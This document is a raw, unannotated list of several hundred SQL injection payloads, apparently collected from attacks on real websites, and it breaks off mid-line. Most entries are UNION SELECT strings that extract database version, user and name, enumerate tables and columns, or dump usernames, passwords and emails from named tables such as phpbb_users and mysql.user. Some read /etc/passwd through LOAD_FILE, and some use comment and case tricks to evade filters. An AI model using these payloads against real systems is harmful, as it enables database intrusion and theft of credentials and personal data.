limit 1,1/* -10 union select 1,2,concat_ws(0x05,version(),database(),user()),4,5,6,7,8,9,10,11/* -10 union select 1,2,concat_ws(0x3a3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48-- -10 union select 1,2,concat_ws(0x3a3a,username,password),4 from pbf_users -- -10 union select 1,2,concat_ws(0x3a,database(),version(),user()),4,5-- -10 union select 1,2,concat_ws(0x3a,user,pass),4,5,6,7,8,9,10,11,12,13 from ad1690.usuarios -- 10 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6/* 10 union select 1,2,concat_ws(0x3a,version(),database(),user()) limit 1,1 -10 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7 10 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -10 UNION SELECT 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12/* -10 union select 1,2,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),4,5,6,7 -10 union select 1,2,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49/* -10 union select 1,2,convert(version() using latin1),4,5,6,7,8,9,10 -10 union select 1,2,id,4,name,6,7,8,9 from client/* -10 union select 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 from information_schema.tables -- -10' UNION SELECT 1,2,table_name from information_schema.tables limit 1,1/* -10' union select 1,2,unhex(hex(concat_ws(0x3a,user(),version(),database()))),4,5,6/* -10 union select 1,2,user()/* -10 union select 1,2,version(),4,5,6,7,8-- -10 union select 1,adres,3,4,price from party where id=264/* -10 union select 1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3 from users/* -10 UNION SELECT 1,cast(version() as char),3-- -10 union select 1,concat(adminlogin,0x3a,adminpassword),3,4,5,6,7 from admins-- -10 union select 1,concat(login,char(58),password) from users/* 10 union select 1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7-- -10 union select 1,concat(user,0x3a,password),3,4,5,6,7 from mysql.user limit 1,3/* 10 UNION SELECT 1,concat(user_type,0x2e,user_username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from users-- -10 union select 1,concat(user(),version()),3,4,5,6,7/* -10' union select 1,concat(version(),0x3a,database(),0x3a,user()),3/* 10' union select 1,concat(Version(),0x3a,Database(),0x3a,User()) LIMIT 1,1-- -10 /*!union*/ /*!select*/ 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7 -10 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4/* -10 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -10 union select 1,concat_ws(0x3a,name,passwd) from users/* -10' union select 1,concat_ws(0x3a,table_name,table_schema),3 from information_schema.columns where column_name like 'name'# 10' union select 1,concat_ws(0x3a,user(),database()),3,4,5,6,7/* -10 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13-- -10 union select 1,concat_ws(0x3a,user(),version(),database()),3,4/* -10 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6 -- -10 UNION SELECT 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12-- -10 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9-- 10 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 limit 1,1-- -10 UNION SELECT 1,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),3,4 -10 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11 -- -10 union select 1,concat_ws(0x3a,version(), user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- -10 union select 1,concat_ws(0x3a,version(),@@version_compile_os,user()) ,3,4 -- -10 union select 1,convert(version() using latin1),3,4,5,6,7,8,9,10 -10 union select 1,LOAD_FILE( 0x2f6574632f706173737764),3,4,5,6,7 members/* -10 union select 1,password,3,4,5,6,7,8,9 from user/* -10 union select 1,password,lastname,4,5,6,firstname,userid,9 from user/* -10 union select 1,password,username from users order by 2,2/* -10 UNION SELECT 1,SQL,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 -10 union select 1,unhex(hex(concat_ws(0xa,username,user_password))),3,4,5,6,7,8,9 from karasik_breadboard.phpbb_users limit 1,1-- -10 union select 1,user(),3,4-- -10 union select 1,@@version,3-- 10 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14 limit 1,1 -10 union select 1,VERSION(),3,4 from accounts/* 10 union select 1,version(),3,4 limit 1,1/* -10 union select concat(user(),0x3a,database(),0x3a,version()),2,3,4,5-- -10 union select concat_ws(0x3a3a,user_name,password),2,3,4,5 from users limit 2,10 -- -10 union select concat_ws(0x3a,version(),0x3a,user(),@@version_compile_os),2-- -10 union select concat_ws(0x3a,version(),database(),user()),2,3-- -10' union select concat_ws(0x3a,version(),user(),database()),2/* -10 union select group_concat(nome,char(58),password),2,3,4,5,6,7,8,9,10,11,12,13,14 from immobiliare.user -- -10 union select id,2,3,4,concat(name,char(58),password),6,7,8,9,10,email from users where id=2 limit 0,1/* 10 union select password from mysql.user limit 1,1/* -10 union select version(),2,3 from customers/* -1100 UNION SELECT 1,2,3,4,5,6,7,8,concat_ws(0x2b,version(),user(),@@version_compile_os),10,11,12 -- 1-100 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6-- 1100 union select 1 from users_advPlaces/* 1100 union select 1,table_name,3,4 from information_schema.tables/* 11023 union select 1,2,3,4,5,6,7,8,9,10,concat(table_schema,0x3a,table_name,0x3a,column_name) from information_schema.columns-- -11027 union select 1,2,3,4,group_concat(username,0x3a,passwd,0x3a,admin),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from db_grant-- -11029 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2F,email,pass),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from users limit 2,10-- -11050 UNION SELECT 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 11061' and 1=0 union select version() -- -1106 UNION SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11 from editors limit 1,1/* -1106 union select 1,2,3,version(),5-- -1107/**//*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,user(),10,11,12-- 1108_519_no_1718 and substring(version(),1,1)=5 -1108 union select 1,2,table_name,4,5,6,7,8,9,10,11 from information_schema.tables -- 1109 and 1=(selectversion()::intfrompg_user) -1109 UNION SELECT 1,concat(user,password),3,4 from mysql.user/* 110 and 1=0 union select 1,2,3,4,5,6,7,8,9,0-- 110 aNd 1=0 UNION SELECT 1,2,3,version(),5,6 -- -110 union select 1,2,3,4,5,6,7,aes_decrypt(aes_encrypt(version(),0x73),0x73),9,10/* 110 union select 1,2,3,4,5,6,column_name,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 from information_schema.columns where table_name=0x6a6f735f7573657273 -- -110 union select 1,2,3,4,5,6,concat_ws(0x3a,database(),version(),user()),8,9,10-- 110 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),6 LIMIT 1,1-- 110 union select 1,2,password,admin from settings/* -110' union select 1,2,version(),4,5,6,7,8,9 /* -110 union select 1,concat_ws(0x3a,version(),database(),user(),@version_compile_os) -110 union select 1,group_concat(0x0b,id,0x3a,username,0x3a,password),3,4,5,6,7,8 from admin -- -110 union select 1,unhex(hex(concat_ws(0x3a,Id,username,password))),3,4,5,6,7,8,9,10,11,12 from admins-- -110 UNION SELECT CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64) -1110 UNION SELECT 1,2,3,4,5,concat_ws(0x3a,user(),database(),version())/* 11110 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,version(),38 11111111111111111 union select 1,2,3,version(),5,6,7,8,9,10,11/* 11111111111111111 union select 1,concat(username,char(58),pword),5,4,5,6,7,8,9,10,11,12,13,14 from users where length(username)>=1 limit 0,1/* -111111111111 union select 1,concat(name, char(58),name2,char(58),name3,char(58),passw,char(58),police,char(58),birthday,char(58),email,0x3C62723E) FROM author_tbl limit 0,1000/* 111111111111 union select concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10/* 111111111111 union select table_name,2,3,4,5,6,7,8,9,10 from information_schema.tables limit 26,1/* 1111111111 union select 1,2,USER(),VERSION(),5/* 111111111' union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13/* 111111111 union select 1,2,concat(database(),char(58),user(),char(58),version())/* 111111111 union select 1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7/* 11111111 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,database(),21,22,23,24,25,26,27,28,version(),30,current_date(),32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51/* 11111111 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 111111' UNION SELECT 1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user(),database(),version()),1),1),8,9,10,11,12,13,14,15,16/* -111111 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9-- -11111 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat(name,char(58),password),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 from users/* 11111' UNION SELECT 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13/* -1111 UNION SELECT 1,2,3,4,5,6,7,8,table_name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53 from information_schema.tables limit 20,1/* -1111 UNION SELECT 1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12 from user limit 0,1/* -1111 UNION SELECT 1,2,name,4,5,6,7,8,9,10,11,12,13,14,15 from user limit 2,1/* -1111'UNioN SeLeCt 1,GRouP_ConCaT(username,0x3a,password,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from mmyo_users-- -1111 union select 1,table_name,3,4 from information_schema.tables limit 0,1-- 1111 union select 1,user(),version(),4,5,6,7/* -1112 union select 1,2,3,user(),5,6,7,version(),9,10,database(),12/* -1113 UNION SELECT 0,concat_ws(0x0b,user(),version(),database()),2,3,4,5,6 1114823 union select 1,concat_ws(char(58),version(),user(),database()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 -- 1115 aNd 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 -- 1116 and 1=0 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15-- 11175 union select version(),2,3,4,5,6,7,8,9,0,1/* 11176 AND SUBSTRING((y()),1,1)=x -11176 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,name,password),14,15,16,17,18,19,20,22 from auth limit 5,1 -11177 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,TABLE_NAME,54,55,56,57,58,59,60,61,62 from INFORMATION_SCHEMA.TABLES limit 0,1 -- 1117 and 1=0 union select concat_ws(0x3a,userid,password),2,3,4,5,6,7,8,9,10 from tblUser-- -1117 UNION SELECT 0,1,2,3,4,5,6,7,8,9,concat_ws(0x0b,user(),database(),version()),11,12 -11184 union select 1,2,concat(user(),char(58),version(),char(58),database()),4,5,6,7,8,9,10,11,12,13,14-- -1118 and 1=0 union select 1,2,3,4,5,version(),7,8/* -1118 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5 111 and 0 union select 1,concat_ws(0x3a,user(),version(),database()),3 -- 111 AND 1=2 UNION SELECT 0,1,2,null,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -111 and 1=2 union select 1,2,3,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),5,6,7,8 -- 111 and 1=2 union select 1,group_concat(concat_ws(0x3a,loginname,password)),3,4 from users-- 111 union all select 1,2,3,4,5,6, -111 union all select 1,version(),group_concat(username,0x3a,password),4,5 from usertable-- 111 union select 1,2,3,4,5,6,7,8,9,0,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat_ws(0x3a,name,pass) from users-- -111 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15/* -111 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),database(),user()),13,14,15,16 -- -111 union select 1,2,3,4,5,6,7,8,9,10,concat(login,0x3a,pass),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 from users limit 0,1/* -111 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10,11,12/* -111 union select 1,2,3,4,5,6,concat_ws(0x2b,version(),user(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 -- -111 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57-- -111 union select 1,2,3,4,user(),version(),7,8,9,10,11,12,13,14,15/* -111 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,login,pwd),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from users/* -111 UNION SELECT 1,2,3,concat_ws(0x3a,user,password),5 from mysql.user/* -111 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password), 0x71),0x71),4 from mysql.user/* -111 union select 1,2,concat(id,0x3a,name),4,5,6,7,8,9 from content/* -111 UNION SELECT 1,2,concat(USER(),char(58),VERSION(),char(58),DATABASE()),4,5,6,7,8,9,10,11,12,13/* -111 Union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12 -- -111 UNION SELECT 1,2,concat_ws(0x3a,U_Username,U_password) from w3t_Users where /* -111 union select 1,column_name,3 from information_schema.columns where table_name=0x7573657273 limit 0,1-- 111 union select 1,concat(0x2,version(),user(),database()) limit 1,1/* -111 union select 1,concat_ws(0x0b,version(),user(),database()),3,4,5,6,7 -111 union select 1,concat_ws(0x2b,version(),user(),@@version_compile_os) -- -111 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -111/**/union/**/select/**/1,concat_ws(0x3a,table_name) from information_schema.tables limit 22,1-- -111 UNION SELECT 1,concat_ws(0x3a,username,user_password) from sp_users/* 111 union select 1,group_concat(login,char(58),password),3,4,5,6,7,8,9,10,11 from usuarios -111 union select 1,user(),3,4,version(),database(),7,8,9,10,11,12,13/* -111 UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5,6-- -111 union select convert(version() using latin1)/* -111 UNION SELECT email,password,3,4 from shop/* -111 union select user(),2 -- 11203-999.9 union select 1,2,3,4,5,6,concat_ws(user(),version(),database()),8-- -11206 union select 1,2,concat_ws(0x3a3a,userlevel,username,password,email),4,5 from mob_users/* -1120' UNION SELECT 0,1,2,concat_ws(0x0b,user(),version(),database()),4,5,6,7,8,9,10 -- -1120' UNION SELECT 0,1,2,concat_ws(0x2b,login,passw,admin),4,5,6,7,8,9,10 FROM auth_users -- -1120 union select 1,2,3,concat_ws(0x40,table_schema,table_name),5,6,7,8,9,10,11,12 from information_schema.tables limit 17,1/* 1121000000000 UNION SELECT 1,concat_ws(0x3a,username,user_password,user_email,user_icq),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from phpbb2_users/* -1123 union select 1,2,3,table_name,5,6,7,8 from information_schema.columns where column_name like char(37,112,97,115,115,37) limit 0,1/* 1127109 and 1=0 union select 1,2,3,4,version(),6,7,8-- -1127 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(logname,char(58),password),15,16,17,18,19 from admindetails -1127 union select 1,2,3,version()/* -11282 union select 1,2,3,4 /* -1128 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 -- -11291 union select 1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 1129 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database())-- 112 and 1=0 union select 1,2,version(),4,5,6-- -112 and 1=2 union select 1,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11 -- -112' uNIon sELEct 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- -112 union select 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from users/* -112 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9 -- -112 UNION SELECT 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16/* -112 union select 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* -112 union select 1,2,concat_ws(0x3a,version(),user(),@@version_compile_os),4 -- -112 union select concat_ws(0x3a,id,name,pass),2,3 from users -- -112 union select count(email),2,3,4,5,6,7,8,9,10,11,12,13 from users-- 1132 aNd 1=0 UNION SELECT 1,2,3,4,version() -- -1132 UNION SELECT 1,count(*),3 from users/* -113482 union select 1,concat_ws(0x3a,name,password),3,4 from users -- -11364 union -11364 union select 1,2,3,4,5,concat(version(),char(58,58),database(),char(58,58),user())/* ## 113.9unionallselect1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 -- 1139 union select 1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8,9,10,11/* -113 UniON SElecT 1 -- -113 union select 1,2,3,4,5,6,7,8,9,0,11,12,13,concat_ws(0x3a,version(),user(),database()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* 113 union select 1,2,3,4,5,version(),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 -- -113 union select 1,2,3,4,concat(login,0x3a,passwd),6 from users-- -113 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7 -- -113 UNION SELECT 1,2,3,concat(user,0x3a,password),5,6 from mysql.user/* -113 union select 1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71),4,5,6,7/* -113 union select concat_ws(0x3a3a,username,password,section) from administrators limit 1,10 -- 11426 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,concat_ws(char(58),user(),version(),database()),35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 limit 1,1/* -1143 union select 1,2,3,4,5,concat_ws(0x2f,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* -11440 union select 1,2,3,concat_ws(0x3a,version(),database(),useR()),5,6,7,8,9,10 11441 UNION SELECT 1,2,3,concat_ws(0x3a,admin,admin_pw,admin_fullname,admin_email),5,6,7,8,9,10 from passenger_ads.phpads_config-- -11444 union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,unhex(hex(table_name)),21,22,23,24,25,26 from information_schema.tables-- 11458 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,aes_decrypt(aes_encrypt(LOAD_FILE(CHAR(47,101,116,99,47,112,97,115,115,119,100)),1),1),21,22,23,24,25,26,27,28,29,30,31,32 from mysql.user-- 11459 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9,10,11,12,13,14,15,16,17 limit 1,1/* -1145 union select 1,group_concat(table_name,0x3c62723e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from information_schema.tables where table_schema=database() 1146-999.9 union select 1,2,3,concat_ws(user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17-- 1146 and 1=0 union select 1,2,3,4,concat(emails,char(58),rows),6,7,8 from d60577836.rc_settings -- 1147 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15-- -1148 union select 1,2,3,4,version(),user(),7,8,9,10,11,12,13-- 114 UNION SELECT 1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7,8,9,10,11,12,13 limit 1,1 -114 union select 1,2,3,concat(username,0x3a,password),5,6,7,8 from users/* -114 union select 1,2,concat(user_login,0x3a,user_passw),4,5,6 from auth_users -114 UNION SELECT 1,2,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),4 -- -114 union select 1,concat(id,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from members limit 100000,1/* -114 union select concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,column_name),3,4,null,null,7,null,null,now(),null,null,null,null,null,null from information_schema.columns-- 1150 and 1=0 UnIon selECt 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_schema=0x666f72756d -- -11511 union select 1,2,3,4,concat_ws(0x203a20,id,name,password,email),6,7,8 from users limit 16000,1/* 11512 union select 1,unhex(hex(user())),3,4,5,6,7,8,9,10,11,12,13-- 1151 and 1=0 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14 1152 union Select 1,user from mysql.user-- -115447 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -1154 union select 1,2,3,4,5,convert(concat(user_password,char(58),user_name) using latin1),7,8 from user/* -1154 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4-- -1155149030 union select 1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -1155 union select 1,2,3,4,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),6,7-- -1155' union select 1,2,concat(version(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* 1156 UnIon selECt 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -1157947239 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5-- -1158 union select null,user,null,null,null,null,null,null,null,null,null,null from sys.dual -- 115 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41-- -115 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,concat_ws(0x203a20,id,name,psw,access,email,nic),0,1,2,3,4,5 from admins limit 1,1/* 115 uNIon sELEct 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -115 UNION SELECT 1,2,3,4,5,6,7,8,9,concat(version(),0x3a,user(),0x3a,database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* -115 UNION SELECT 1,2,3,4,5,6,7,8,concat_ws(0x3a ,user(),database(),version()) -115 union select 1,2,3,4,5,6,version(),8-- -115 union select 1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7 -- -115 union select 1,CONCAT_WS(CHAR(42),VERSION(),USER(),DATABASE())/* -115 union select 1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/* -115 union select group_concat(column_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from information_schema.columns where table_schema='alexgi_worstreview' and table_name='user_reviews' -1160 union select 1,2,version(),4,database(),6,7,8,9,10,11,12,13,14,15,16 from mysql.user/* -1160 union select 1,column_name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 from information_schema.columns where table_name=char(110,117,107,101,95,117,115,101,114,115) limit 0,1/* -1161008436 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6/* -1163 union select 1,2,concat(memberName,char(58),passwd),4,5 from u19508.smf_members/* -11646 union select concat_ws(0x3a,version(),database(),user()),2,3,4,5/* -1166 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96-- -1167 union select 1,2,3,4,5,6,concat_ws(0x3a,user_nickname,user_passwd),8,9,10,11 from users -- -1168 union select 1,2,concat(user(),char(58),database(),char(58),version()),4,5,6,7/* -1169768767 union select 1,2,concat(user,char(58),pass),4 from admin/* -116 and 1=2 union select 1,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4 -- 116 AND SUBSTRING((y=1..3()),1,1)=x-- -116 or (1,1)=(select count(0),concat((select concat_ws(0x3a,name,password) from users limit 0,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- 116' or (1,1)=(select count(0),concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- -116 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38-- -116 union select 1,2,3,4,5,6,7,8 from user -116 union select 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),6/* 116/**/UNION/**/SELECT/**/1,2,concat(user,0x3a,password),4,5,6,7,8,9,30,31,32 from mysql.user limit 1,1/* -116 union select 1,2,user(),4,5,6,concat(version(),char(58),database()),8,9,10,11,12,13/* -116 union select 1,concat(login,0x3a,password),3,4,5,6,7 from ds_bmwstyle_users -116 UNION SELECT 1,Concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14-- 116 UNION SELECT CONCAT_WS(0x3a,version(),user(),database()),2,3,4,5,6 LIMIT 1,1/* -116 union select table_name,2,3,4,5,6,7 from information_schema.tables 116 union select version(),user(),3,4,database(),6,7,8/* -1170969905 union select 1,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5 -- -1171560816 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin/* 1172 AND NEWS.VERSION=0 AND NEWS.LANG_ID=1 and substring(version(),1,1)="3" -1173 union select 1,2,3,convert(database() using cp1251)/* -1173 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9 -- 11750 and ascii(lower(substring(user(),1,1)))<=100 # -1175532750 union select 1,concat(user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13/* -11767 union select 1,db_name(),@@version,system_user,user,6,7,8,9,10,11,12,13-- -1178 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),database(),user()),14,15,16,17,18,19,20,21,22,23 117 AND 1=0 UNION SELECT 1,2,3,concat_ws(0x3a,login,pass),5,6,7,8,9,10,11,12 FROM ferroli_admins -- -117 union select 